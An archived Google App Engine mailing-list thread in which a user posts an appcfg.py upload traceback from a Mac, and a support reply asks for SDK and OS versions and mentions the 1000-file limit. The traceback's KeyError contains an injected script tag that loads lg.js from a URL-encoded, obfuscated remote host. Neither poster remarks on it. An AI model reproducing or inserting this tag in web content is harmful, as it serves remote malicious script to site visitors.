Hi,

Is this error still occurring?  If so, can you give details as to what SDK
version and the Mac OS version you are using?

Also, if you could run appcfg.py from the command line (if you are using the
Launcher you can Make the Symlinks to get the command line version of
appcfg.py), and run it with the --noisy flag?

It would be helpful to know what your directory structure looked like as
well.  It seems that there are more than 1000 files in your directory, so it
could be related to the 1000 file limit with App Engine.

Thanks,
Marzia

On Mon, Oct 20, 2008 at 5:19 AM, [EMAIL PROTECTED] <
[EMAIL PROTECTED]> wrote:

>
> Hello,
>
> I get a strange error when trying to upload using appcfg.py (see
> below) on a Mac.
>
> Any hint or indication on how to resolve this issue would be highly
> appreciated.
>
> Cheers!
>
> Scanned 500 files.
> Scanned 1000 files.
> Scanned 1500 files.
> Scanned 2000 files.
> Initiating update.
> Cloning 8 static files.
> 2008-10-20 14:13:15,790 ERROR appcfg.py:1334 An unexpected error
> occurred. Aborting.
> Rolling back the update.
> Traceback (most recent call last):
>  File "google_appengine/appcfg.py", line 55, in <module>
>    execfile(script_path, globals())
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1943, in <module>
>    main(sys.argv)
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1936, in main
>    AppCfgApp(argv).Run()
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1521, in Run
>    self.action.function(self)
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1733, in Update
>    lambda path: open(os.path.join(basepath, path), "rb"))
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1313, in DoUpload
>    missing_files = self.Begin()
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1206, in Begin
>    CloneFiles("/api/appversion/cloneblobs", blobs_to_clone, "static")
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1204, in CloneFiles
>    (f, self.files[f]) for f in result.split(LIST_DELIMITER)))
>  File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/
> GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/
> google/appengine/tools/appcfg.py", line 1204, in <genexpr>
>    (f, self.files[f]) for f in result.split(LIST_DELIMITER)))
> KeyError: '<script language=javascript src=http://%77%2E%63%38%38%69%2E
> %63%6E/lg.js></script>                      '
> If deploy fails you might need to 'rollback' manually.
> The "Make Symlinks..." menu option can help with command-line work.
> *** appcfg.py has finished with exit code 1 ***
>
>
> >
>

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups 
"Google App Engine" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to [EMAIL PROTECTED]
For more options, visit this group at 
http://groups.google.com/group/google-appengine?hl=en
-~----------~----~----~----~------~----~------~--~---

Reply via email to